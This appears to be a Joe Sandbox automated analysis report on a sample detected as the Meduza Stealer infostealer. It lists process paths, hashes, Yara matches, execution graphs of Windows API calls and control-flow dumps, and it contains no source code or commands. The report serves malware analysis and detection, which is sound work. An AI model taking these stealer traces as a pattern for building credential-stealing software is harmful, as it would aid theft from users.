                                                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:8
                                                                                                                                                                Start time:04:28:44
                                                                                                                                                                Start date:15/11/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe"
                                                                                                                                                                Imagebase:0x7ff7aa100000
                                                                                                                                                                File size:2'632'704 bytes
                                                                                                                                                                MD5 hash:183E24B654414D7BE786CCD8E6A108A5
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: 00000008.00000002.2193147052.00000218BFD60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 29%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Reset < >

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:12.4%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                  Signature Coverage:3.4%
                                                                                                                                                                  Total number of Nodes:323
                                                                                                                                                                  Total number of Limit Nodes:20
                                                                                                                                                                  execution_graph 34477 118d3f8 34478 118d43e 34477->34478 34482 118d5d8 34478->34482 34485 118d5c8 34478->34485 34479 118d52b 34488 118b750 34482->34488 34486 118b750 DuplicateHandle 34485->34486 34487 118d606 34485->34487 34486->34487 34487->34479 34489 118d640 DuplicateHandle 34488->34489 34490 118d606 34489->34490 34490->34479 34491 73542d0 34492 7354315 MessageBoxW 34491->34492 34494 735435c 34492->34494 34211 4ae4728 34212 4ae4755 34211->34212 34213 4ae4742 34211->34213 34224 4ae22cc 34212->34224 34219 4ae22bc 34213->34219 34215 4ae476a 34217 4ae479b 34215->34217 34218 4ae22bc OleInitialize 34215->34218 34218->34217 34220 4ae22c7 34219->34220 34221 4ae47c6 34220->34221 34229 4ae4be5 34220->34229 34234 4ae4c00 34220->34234 34221->34212 34228 4ae22d7 34224->34228 34225 4ae51de 34225->34215 34228->34225 34247 4ae703a 34228->34247 34251 4ae7048 34228->34251 34230 4ae4c28 34229->34230 34233 4ae4c54 34229->34233 34231 4ae4c31 34230->34231 34239 4ae4844 34230->34239 34231->34221 34233->34221 34235 4ae4c28 34234->34235 34238 4ae4c54 34234->34238 34236 4ae4c31 34235->34236 34237 4ae4844 OleInitialize 34235->34237 34236->34221 34237->34238 34238->34221 34241 4ae484f 34239->34241 34240 4ae4f4b 34240->34233 34241->34240 34243 4ae4860 34241->34243 34244 4ae4f80 OleInitialize 34243->34244 34246 4ae4fe4 34244->34246 34246->34240 34248 4ae7106 34247->34248 34249 4ae708c 34247->34249 34248->34225 34249->34248 34250 4ae7104 KiUserCallbackDispatcher 34249->34250 34250->34248 34252 4ae7106 34251->34252 34253 4ae708c 34251->34253 34252->34225 34253->34252 34254 4ae7104 KiUserCallbackDispatcher 34253->34254 34254->34252 34495 118ac70 34499 118ad68 34495->34499 34509 118ad57 34495->34509 34496 118ac7f 34500 118ad79 34499->34500 34503 118ad9c 34499->34503 34519 118a0c0 34500->34519 34503->34496 34504 118ad94 34504->34503 34505 118afa0 GetModuleHandleW 34504->34505 34506 118afcd 34505->34506 34506->34496 34510 118ad79 34509->34510 34513 118ad9c 34509->34513 34511 118a0c0 GetModuleHandleW 34510->34511 34512 118ad84 34511->34512 34512->34513 34517 118aff0 GetModuleHandleW 34512->34517 34518 118b000 GetModuleHandleW 34512->34518 34513->34496 34514 118ad94 34514->34513 34515 118afa0 GetModuleHandleW 34514->34515 34516 118afcd 34515->34516 34516->34496 34517->34514 34518->34514 34520 118af58 GetModuleHandleW 34519->34520 34522 118ad84 34520->34522 34522->34503 34523 118b000 34522->34523 34526 118aff0 34522->34526 34524 118b014 34523->34524 34525 118a0c0 GetModuleHandleW 34523->34525 34524->34504 34525->34524 34527 118a0c0 GetModuleHandleW 34526->34527 34528 118b014 34527->34528 34528->34504 34529 7350edf 34530 7350f0c 34529->34530 34531 7351040 34530->34531 34532 7352ea3 3 API calls 34530->34532 34533 7352e38 3 API calls 34530->34533 34532->34531 34533->34531 34255 7356c38 34256 7356c4c 34255->34256 34260 7356d61 34256->34260 34264 7356d88 34256->34264 34257 7356d1e 34268 7356dd1 34260->34268 34273 7356de0 34260->34273 34261 7356d96 34261->34257 34265 7356d96 34264->34265 34266 7356dd1 2 API calls 34264->34266 34267 7356de0 2 API calls 34264->34267 34265->34257 34266->34265 34267->34265 34269 7356e02 34268->34269 34270 7356e57 34269->34270 34278 7356f40 34269->34278 34282 7356f31 34269->34282 34270->34261 34274 7356e02 34273->34274 34275 7356e57 34274->34275 34276 7356f31 2 API calls 34274->34276 34277 7356f40 2 API calls 34274->34277 34275->34261 34276->34275 34277->34275 34280 7356f4f 34278->34280 34279 7356fbb 34279->34270 34280->34279 34286 7354f60 34280->34286 34284 7356f4f 34282->34284 34283 7356fbb 34283->34270 34284->34283 34285 7354f60 2 API calls 34284->34285 34285->34283 34290 7354f90 34286->34290 34298 7354f7f 34286->34298 34287 7354f7a 34287->34279 34291 7354fed 34290->34291 34292 735502b 34291->34292 34294 7355038 34291->34294 34295 7355033 34291->34295 34306 73536b8 34292->34306 34294->34295 34310 7355320 34294->34310 34314 7355330 34294->34314 34299 7354fed 34298->34299 34300 7355033 34299->34300 34301 735502b 34299->34301 34303 7355038 34299->34303 34302 73536b8 PostThreadMessageW 34301->34302 34302->34300 34303->34300 34304 7355330 EnumThreadWindows 34303->34304 34305 7355320 EnumThreadWindows 34303->34305 34304->34300 34305->34300 34307 73536c3 PostThreadMessageW 34306->34307 34309 73552fb 34307->34309 34309->34295 34311 7355329 34310->34311 34318 7353ce0 34311->34318 34313 7355382 34313->34295 34315 735534f 34314->34315 34316 7353ce0 EnumThreadWindows 34315->34316 34317 7355382 34316->34317 34317->34295 34319 7353d2f 34318->34319 34322 735355c 34319->34322 34323 7353dd0 EnumThreadWindows 34322->34323 34325 7353db0 34323->34325 34325->34313 34376 7352978 34378 73529a2 34376->34378 34377 7352bda 34380 7352e38 3 API calls 34377->34380 34383 7352ea3 34377->34383 34378->34377 34381 7352ea3 3 API calls 34378->34381 34391 7352e38 34378->34391 34380->34377 34381->34377 34384 7352e55 34383->34384 34386 7352ea7 34383->34386 34385 7352e62 34384->34385 34388 7352ea3 3 API calls 34384->34388 34385->34377 34387 735308b 34386->34387 34394 73539c0 34386->34394 34398 7353991 34386->34398 34388->34385 34393 7352ea3 3 API calls 34391->34393 34392 7352e62 34392->34377 34393->34392 34395 73539c8 34394->34395 34402 7353a56 34395->34402 34399 73539c0 34398->34399 34401 7353a56 3 API calls 34399->34401 34400 73539d3 34400->34387 34401->34400 34405 7353518 34402->34405 34406 7353523 34405->34406 34410 7353ce0 EnumThreadWindows 34406->34410 34414 7353cd1 34406->34414 34407 7353c80 34418 7353f20 34407->34418 34423 7353f30 34407->34423 34428 7353fe8 34407->34428 34408 73539d3 34408->34387 34410->34407 34415 7353d2f 34414->34415 34416 735355c EnumThreadWindows 34415->34416 34417 7353db0 34416->34417 34417->34407 34419 7353f45 34418->34419 34420 7353fbc 34419->34420 34433 7354210 34419->34433 34436 7354218 KiUserCallbackDispatcher 34419->34436 34420->34408 34425 7353f45 34423->34425 34424 7353fbc 34424->34408 34425->34424 34426 7354210 KiUserCallbackDispatcher 34425->34426 34427 7354218 KiUserCallbackDispatcher 34425->34427 34426->34425 34427->34425 34429 7354036 34428->34429 34430 7354133 34429->34430 34431 7354210 KiUserCallbackDispatcher 34429->34431 34432 7354218 KiUserCallbackDispatcher 34429->34432 34430->34408 34431->34429 34432->34429 34434 7354218 KiUserCallbackDispatcher 34433->34434 34435 735428e 34434->34435 34435->34419 34437 735428e 34436->34437 34437->34419 34326 4aec6a0 DispatchMessageW 34327 4aec70c 34326->34327 34363 4aebf00 PeekMessageW 34364 4aebf77 34363->34364 34534 1184668 34535 118467a 34534->34535 34536 1184686 34535->34536 34540 1184779 34535->34540 34545 1183e34 34536->34545 34538 11846a5 34541 118479d 34540->34541 34549 1184879 34541->34549 34553 1184888 34541->34553 34546 1183e3f 34545->34546 34561 1185c44 34546->34561 34548 1186fd2 34548->34538 34550 11848af 34549->34550 34552 118498c 34550->34552 34557 11844b4 34550->34557 34555 11848af 34553->34555 34554 118498c 34554->34554 34555->34554 34556 11844b4 CreateActCtxA 34555->34556 34556->34554 34558 1185918 CreateActCtxA 34557->34558 34560 11859db 34558->34560 34562 1185c4f 34561->34562 34565 1185c84 34562->34565 34564 11870b5 34564->34548 34566 1185c8f 34565->34566 34569 1185cb4 34566->34569 34568 118719a 34568->34564 34570 1185cbf 34569->34570 34573 1185ce4 34570->34573 34572 118728d 34572->34568 34575 1185cef 34573->34575 34574 11885c9 34574->34572 34575->34574 34578 118cd2f 34575->34578 34582 118cd30 34575->34582 34579 118cd51 34578->34579 34580 118cd75 34579->34580 34586 118cee0 34579->34586 34580->34574 34583 118cd51 34582->34583 34584 118cd75 34583->34584 34585 118cee0 4 API calls 34583->34585 34584->34574 34585->34584 34587 118ceed 34586->34587 34588 118cf27 34587->34588 34590 118b740 34587->34590 34588->34580 34591 118b74b 34590->34591 34593 118dc38 34591->34593 34594 118d044 34591->34594 34593->34593 34595 118d04f 34594->34595 34596 1185ce4 4 API calls 34595->34596 34597 118dca7 34596->34597 34598 118dcb6 34597->34598 34601 118dd20 34597->34601 34608 118dd18 34597->34608 34598->34593 34602 118dd4e 34601->34602 34603 118de1f 34602->34603 34604 118dd8f 34602->34604 34607 118df46 34602->34607 34606 118df22 KiUserCallbackDispatcher 34603->34606 34603->34607 34605 118de1a KiUserCallbackDispatcher 34604->34605 34604->34607 34605->34607 34606->34607 34609 118dd4e 34608->34609 34610 118df46 34609->34610 34611 118dd8f 34609->34611 34613 118de1f 34609->34613 34611->34610 34612 118de1a KiUserCallbackDispatcher 34611->34612 34612->34610 34613->34610 34614 118df22 KiUserCallbackDispatcher 34613->34614 34614->34610 34328 73546a1 34329 7354642 34328->34329 34329->34328 34333 73546c1 34329->34333 34340 73546d0 34329->34340 34334 73546eb 34333->34334 34347 73548c5 34334->34347 34351 73548bc 34334->34351 34355 7354780 34334->34355 34359 7354790 34334->34359 34341 73546eb 34340->34341 34343 73548c5 2 API calls 34341->34343 34344 7354790 2 API calls 34341->34344 34345 7354780 2 API calls 34341->34345 34346 73548bc 2 API calls 34341->34346 34342 73546b8 34343->34342 34344->34342 34345->34342 34346->34342 34348 73548ab 34347->34348 34349 7354906 34348->34349 34350 7354f60 2 API calls 34348->34350 34350->34349 34353 73548ab 34351->34353 34352 7354906 34353->34352 34354 7354f60 2 API calls 34353->34354 34354->34352 34357 73547b9 34355->34357 34356 73547d2 34356->34356 34357->34356 34358 7354f60 2 API calls 34357->34358 34358->34356 34360 73547b9 34359->34360 34361 73547d2 34360->34361 34362 7354f60 2 API calls 34360->34362 34362->34361 34615 4ae2ad8 34616 4ae2b02 34615->34616 34617 4ae2b24 34616->34617 34618 4ae2be7 KiUserCallbackDispatcher 34616->34618 34618->34617 34438 73505e8 34440 7350615 34438->34440 34439 73506a8 34443 7352ea3 3 API calls 34439->34443 34444 7352e38 3 API calls 34439->34444 34440->34439 34441 735071c 34440->34441 34445 73500dc 34440->34445 34443->34441 34444->34441 34446 73500e7 34445->34446 34450 73522a0 34446->34450 34454 7352292 34446->34454 34447 7352288 34447->34440 34451 73522c7 34450->34451 34458 4ae3f9f 34451->34458 34452 73522eb 34452->34452 34455 73522c7 34454->34455 34457 4ae3f9f 2 API calls 34455->34457 34456 73522eb 34456->34456 34457->34456 34459 4ae3fc4 34458->34459 34460 4ae3fa5 34458->34460 34463 4ae4298 34459->34463 34466 4ae42a0 PostMessageW 34459->34466 34460->34452 34464 4ae42a0 PostMessageW 34463->34464 34465 4ae430c 34464->34465 34465->34460 34467 4ae430c 34466->34467 34467->34460 34365 4ae0c10 34367 4ae0c21 34365->34367 34366 4ae0c81 34367->34366 34371 4ae0dca 34367->34371 34374 4ae0dd0 SendMessageW 34367->34374 34368 4ae0db9 34372 4ae0dd0 SendMessageW 34371->34372 34373 4ae0e3c 34372->34373 34373->34368 34375 4ae0e3c 34374->34375 34375->34368 34468 4ae6370 34469 4ae6382 34468->34469 34470 4ae649d 34469->34470 34471 4ae703a KiUserCallbackDispatcher 34469->34471 34472 4ae7048 KiUserCallbackDispatcher 34469->34472 34471->34470 34472->34470 34473 4ae2970 34474 4ae29b5 GetClassInfoW 34473->34474 34476 4ae29fb 34474->34476 34619 4aec1d0 KiUserCallbackDispatcher 34620 4aec244 34619->34620

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 305 4aee6e8-4aee707 306 4aee70d-4aee72d call 4aed054 305->306 307 4aee832-4aee857 305->307 311 4aee72f-4aee732 306->311 312 4aee73d-4aee746 306->312 315 4aee85e-4aee88a 307->315 311->312 313 4aee734-4aee737 311->313 372 4aee748 call 4aee6e8 312->372 373 4aee748 call 4aee6e2 312->373 313->312 313->315 341 4aee891 315->341 316 4aee74e-4aee750 317 4aee756-4aee766 316->317 318 4aee825-4aee82f 316->318 320 4aee76f-4aee774 317->320 321 4aee768-4aee76d 317->321 324 4aee776-4aee782 320->324 325 4aee784-4aee789 320->325 323 4aee79f-4aee7c7 call 4aed060 321->323 332 4aee7cd-4aee7e0 323->332 333 4aee896-4aee8f2 call 4aed07c 323->333 324->323 326 4aee79a-4aee79c 325->326 327 4aee78b-4aee798 325->327 326->323 327->323 338 4aee7e2-4aee81f 332->338 339 4aee821-4aee823 332->339 342 4aee9ec 333->342 343 4aee8f8-4aee909 333->343 338->339 339->318 339->341 341->333 346 4aee9f1-4aee9f5 342->346 350 4aee90f-4aee94d call 4aed088 343->350 351 4aee9b9-4aee9e5 343->351 348 4aeea09 346->348 349 4aee9f7-4aeea06 346->349 349->348 365 4aee952-4aee957 350->365 351->342 366 4aee959-4aee97e 365->366 367 4aee980-4aee984 365->367 366->346 368 4aee99d-4aee9b7 367->368 369 4aee986-4aee998 call 4aed088 367->369 368->346 369->368 372->316 373->316
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $(&^q$(bq$Hbq
                                                                                                                                                                  • API String ID: 0-1723523991
                                                                                                                                                                  • Opcode ID: 2ac2b6e66a81f1299252f42f0de96390c26bb0fd4529607aa3682eb1913f16c9
                                                                                                                                                                  • Instruction ID: 6a9258784a92c16190bb67a76d90a1c0e9e06e0108ec78f60aee828b3755ee41
                                                                                                                                                                  • Opcode Fuzzy Hash: 2ac2b6e66a81f1299252f42f0de96390c26bb0fd4529607aa3682eb1913f16c9
                                                                                                                                                                  • Instruction Fuzzy Hash: 34916E71E002199FDB18DFBAD8545BFBBF6EF88300B148529E415EB250DB35AD06CBA4

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 524 73505e8-7350613 525 7350615 524->525 526 735061a-7350643 524->526 525->526 527 7350645-735065c 526->527 528 7350648-7350649 526->528 538 7350667-7350673 527->538 530 735067b-7350680 528->530 531 7350685-7350686 530->531 532 7350682-7350688 530->532 535 7350689-7350690 531->535 532->535 536 7350692 535->536 537 7350699-7350716 535->537 536->537 539 73506a2-73506a3 536->539 540 735069c-73507a7 536->540 541 73506a8-73506a9 536->541 548 73507aa-735084c 537->548 568 735071c-735075e call 118ff58 537->568 538->530 544 735086b-7350870 539->544 540->548 545 7350fc8-7351034 541->545 549 7350882-7350985 544->549 550 7350872-735087d 544->550 656 735103a call 7352ea3 545->656 657 735103a call 7352e38 545->657 614 7350857-7350863 548->614 553 7350988-73509da 549->553 557 735087f-73508f2 550->557 558 7350888-7350889 550->558 559 73509dd-73509e2 553->559 557->553 605 73508f8-7350957 557->605 558->559 563 73509e4-73509eb 559->563 564 73509f0-7350c2e 559->564 573 73509f6-7350db1 563->573 574 73509ed-7350b2a 563->574 576 7350c31-7350ca3 call 73500dc 564->576 587 7350764-7350779 568->587 584 7350db4-7350e00 573->584 621 7350cb0-7350d1e 574->621 613 7350ca8-7350caf 576->613 581 7351040-7351089 624 7351090-73510d4 581->624 597 7350e06-7350e31 584->597 598 7350b2f-7350b9b 584->598 593 735126a-735126e 587->593 595 7351270-735127a 593->595 596 735128c 593->596 595->596 603 735127c-7351282 595->603 611 735128d 596->611 604 7350e33-7350e37 597->604 598->576 631 7350ba1-7350be2 598->631 615 735128b 603->615 609 7350e55 604->609 610 7350e39-7350e43 604->610 618 7350eba-7350ebe 605->618 609->618 610->609 616 7350e45-7350e54 610->616 611->611 613->621 614->544 615->596 616->609 622 7350ec0-7350eca 618->622 623 7350edc 618->623 621->584 645 7350d24-7350d65 621->645 622->623 627 7350ecc-7350edb 622->627 623->545 635 7351126-7351214 624->635 636 73510d6-7351120 624->636 627->623 644 7350beb-7350c00 631->644 635->593 636->635 644->604 654 7350d68 call 7351ee4 645->654 655 7350d68 call 73523a2 645->655 651 7350d6e-7350d83 651->604 654->651 655->651 656->581 657->581
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: {"
                                                                                                                                                                  • API String ID: 0-4254758213
                                                                                                                                                                  • Opcode ID: 6618cd9e46f32d78736680263b12cf5c341e39901d1c220a34f966ca359687ed
                                                                                                                                                                  • Instruction ID: 04c0fad70cc5f36c8ca256ec2a48f9674bc5cc0819bdebdbf494a32466bbaafc
                                                                                                                                                                  • Opcode Fuzzy Hash: 6618cd9e46f32d78736680263b12cf5c341e39901d1c220a34f966ca359687ed
                                                                                                                                                                  • Instruction Fuzzy Hash: 8362AFB4A00229CFDB24CF68C984BD9B7B1FF4A300F5085A9D849AB365D771AE85CF51
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5904c2054c1a4130c12ed78bf2ca2579ee41b25e044f460da51d700b12b9ba7e
                                                                                                                                                                  • Instruction ID: 38c88272b3aa798b091a1355d10287fdc576a0b219561f9878fb46145899ada8
                                                                                                                                                                  • Opcode Fuzzy Hash: 5904c2054c1a4130c12ed78bf2ca2579ee41b25e044f460da51d700b12b9ba7e
                                                                                                                                                                  • Instruction Fuzzy Hash: 36D1CAB07017018FEB19EB79C550B6EB7FBAF89604F14846ED54ACB290DB39E902CB51
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 56adf78de4b46944b589eb783a809bcb8c8b621f751dadd6b3d4122112986671
                                                                                                                                                                  • Instruction ID: 5e215a33af04547b7f452748961819436da9d5db895180a1f6e4b6baa99afd09
                                                                                                                                                                  • Opcode Fuzzy Hash: 56adf78de4b46944b589eb783a809bcb8c8b621f751dadd6b3d4122112986671
                                                                                                                                                                  • Instruction Fuzzy Hash: 71D13E30A00209CFEB14DFA6C988BADBBF1BF88304F548554E525AF2A5DB74F945DB90
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 21c1b8af0e7572d3d84c73a7ed1781ecf03d505b5a13a4b87c9c2f1472f65fa2
                                                                                                                                                                  • Instruction ID: 628a7a4b13d36a8d9618e25c7f283a182cde75e6264e66e7e43acef86bb84d79
                                                                                                                                                                  • Opcode Fuzzy Hash: 21c1b8af0e7572d3d84c73a7ed1781ecf03d505b5a13a4b87c9c2f1472f65fa2
                                                                                                                                                                  • Instruction Fuzzy Hash: 95C1B5B4A41219CFDB14DF64C580B9EB7B2FF49304F2091A9D809AB365DB34AD86CF50

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 658 118ad68-118ad77 659 118ad79-118ad86 call 118a0c0 658->659 660 118ada3-118ada7 658->660 667 118ad88 659->667 668 118ad9c 659->668 661 118ada9-118adb3 660->661 662 118adbb-118adfc 660->662 661->662 669 118ae09-118ae17 662->669 670 118adfe-118ae06 662->670 713 118ad8e call 118aff0 667->713 714 118ad8e call 118b000 667->714 668->660 672 118ae19-118ae1e 669->672 673 118ae3b-118ae3d 669->673 670->669 671 118ad94-118ad96 671->668 674 118aed8-118af98 671->674 676 118ae29 672->676 677 118ae20-118ae27 call 118a0cc 672->677 675 118ae40-118ae47 673->675 708 118af9a-118af9d 674->708 709 118afa0-118afcb GetModuleHandleW 674->709 678 118ae49-118ae51 675->678 679 118ae54-118ae5b 675->679 680 118ae2b-118ae39 676->680 677->680 678->679 683 118ae68-118ae71 call 118a0dc 679->683 684 118ae5d-118ae65 679->684 680->675 689 118ae7e-118ae83 683->689 690 118ae73-118ae7b 683->690 684->683 692 118aea1-118aeae 689->692 693 118ae85-118ae8c 689->693 690->689 698 118aeb0-118aece 692->698 699 118aed1-118aed7 692->699 693->692 694 118ae8e-118ae9e call 118a0ec call 118a0fc 693->694 694->692 698->699 708->709 710 118afcd-118afd3 709->710 711 118afd4-118afe8 709->711 710->711 713->671 714->671
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2133925487.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1180000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                  • Opcode ID: e5b64d62b0a1fa79fde675447287b134f1beeb6e8fb4062795e0e330863c7b48
                                                                                                                                                                  • Instruction ID: 2315a175fe376b366f72871c1a272d4333f76022587d31249c6c9b515963faf0
                                                                                                                                                                  • Opcode Fuzzy Hash: e5b64d62b0a1fa79fde675447287b134f1beeb6e8fb4062795e0e330863c7b48
                                                                                                                                                                  • Instruction Fuzzy Hash: B5711470A00B058FD728EF29E54175ABBF1FF88304F008A2AD58AD7A90D775E946CF91

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 715 4ae2ad8-4ae2b04 717 4ae2b06-4ae2b11 715->717 718 4ae2b24-4ae2b2b 715->718 717->718 720 4ae2b13-4ae2b22 717->720 720->718 722 4ae2b2c-4ae2b52 720->722 725 4ae2b97-4ae2b98 722->725 726 4ae2b9a-4ae2bc3 call 4ae1fa4 725->726 727 4ae2b54-4ae2b75 725->727 735 4ae2c1f-4ae2c26 726->735 736 4ae2bc5-4ae2c10 KiUserCallbackDispatcher 726->736 727->725 737 4ae2b77-4ae2b86 727->737 742 4ae2c12-4ae2c1c 736->742 737->725 740 4ae2b88-4ae2b95 737->740 740->726 742->735
                                                                                                                                                                  APIs
                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04AE2BF8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                  • Opcode ID: 517bac9471c8537bdd6a42029f4e2090cb62cc7a6f94197a1c1bacddc3ed55a5
                                                                                                                                                                  • Instruction ID: 15acc7ea90f44a6c2eff4185a42c48773d95d523448aebe56715f3868ec1f80c
                                                                                                                                                                  • Opcode Fuzzy Hash: 517bac9471c8537bdd6a42029f4e2090cb62cc7a6f94197a1c1bacddc3ed55a5
                                                                                                                                                                  • Instruction Fuzzy Hash: EF413B72B402049FDB14EF6AC885AAEBBF5EF88314F1440A9E505EB361DB31EC41CB60

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 744 1185a84-1185a8f 746 1185b09-1185b1b 744->746
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2133925487.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1180000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 43f38e9efeedfa84980df8df2c78e0503b5955b8755cafe4f6e590ca258e52aa
                                                                                                                                                                  • Instruction ID: 20a97a658cd0a50447adcd4517fd8aeca021efd21b4c754e8556b59ede9f4bc4
                                                                                                                                                                  • Opcode Fuzzy Hash: 43f38e9efeedfa84980df8df2c78e0503b5955b8755cafe4f6e590ca258e52aa
                                                                                                                                                                  • Instruction Fuzzy Hash: 0731ECB1C04249CFDF18EFA8C8856EDBBB2EF46314F14808AC049AB256D775A946CF51

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 748 118590c-118598c 749 118598f-11859d9 CreateActCtxA 748->749 751 11859db-11859e1 749->751 752 11859e2-1185a3c 749->752 751->752 759 1185a4b-1185a4f 752->759 760 1185a3e-1185a41 752->760 761 1185a60 759->761 762 1185a51-1185a5d 759->762 760->759 764 1185a61 761->764 762->761 764->764
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 011859C9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2133925487.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1180000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Create
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                  • Opcode ID: 12793cc8187ec22edea82127cbc5691cdb661bd14ec870010d6bad8498759364
                                                                                                                                                                  • Instruction ID: aadfb397fc2796bbc6cc85e8f1bf2c24f3cb751ffa69b76f784d0150218d519f
                                                                                                                                                                  • Opcode Fuzzy Hash: 12793cc8187ec22edea82127cbc5691cdb661bd14ec870010d6bad8498759364
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F41B3B0C00719CBDB14DFA9C9857CDBBB6FF49304F24805AD408AB255DB756946CF90

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
